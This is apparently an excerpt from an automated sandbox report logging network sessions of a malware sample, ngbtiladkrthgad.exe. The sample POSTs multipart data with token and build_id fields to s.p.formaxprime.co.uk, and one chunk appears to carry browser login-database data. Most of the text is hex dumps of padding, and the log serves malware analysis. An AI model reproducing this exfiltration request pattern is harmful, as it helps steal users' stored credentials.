                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:05 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.44973578.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:05 UTC273OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----jmym7qiw4wlx4e3ozmoz
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 55081
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 6d 79 6d 37 71 69 77 34 77 6c 78 34 65 33 6f 7a 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 6a 6d 79 6d 37 71 69 77 34 77 6c 78 34 65 33 6f 7a 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 6a 6d 79 6d 37 71 69 77 34 77 6c 78 34 65 33 6f 7a 6d 6f 7a 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------jmym7qiw4wlx4e3ozmozContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------jmym7qiw4wlx4e3ozmozContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------jmym7qiw4wlx4e3ozmozCont
                                                                                            2025-03-13 13:50:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:05 UTC16355OUTData Raw: 43 42 4a 54 6c 52 46 52 30 56 53 4c 43 42 7a 61 47 46 79 61 57 35 6e 58 32 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 39 6b 61 58 4e 77 62 47 46 35 5a 57 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 47 74 6c 65 57 4e 6f 59 57 6c 75 58 32 6c 6b 5a 57 35 30 61 57 5a 70 5a 58 49 67 51 6b 78 50 51 69 77 67 63 32 56 75 5a 47 56 79 58 33 42 79 62 32 5a 70 62 47 56 66 61 57 31 68 5a 32 56 66 64 58 4a 73 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b
                                                                                            Data Ascii: CBJTlRFR0VSLCBzaGFyaW5nX25vdGlmaWNhdGlvbl9kaXNwbGF5ZWQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIGtleWNoYWluX2lkZW50aWZpZXIgQkxPQiwgc2VuZGVyX3Byb2ZpbGVfaW1hZ2VfdXJsIFZBUkNIQVIsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3Jk
                                                                                            2025-03-13 13:50:05 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:06 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.44973678.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:07 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----4w4ekngvaaaim7gdj5pp
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 186149
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 77 34 65 6b 6e 67 76 61 61 61 69 6d 37 67 64 6a 35 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 34 77 34 65 6b 6e 67 76 61 61 61 69 6d 37 67 64 6a 35 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 34 77 34 65 6b 6e 67 76 61 61 61 69 6d 37 67 64 6a 35 70 70 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------4w4ekngvaaaim7gdj5ppContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------4w4ekngvaaaim7gdj5ppContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------4w4ekngvaaaim7gdj5ppCont
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
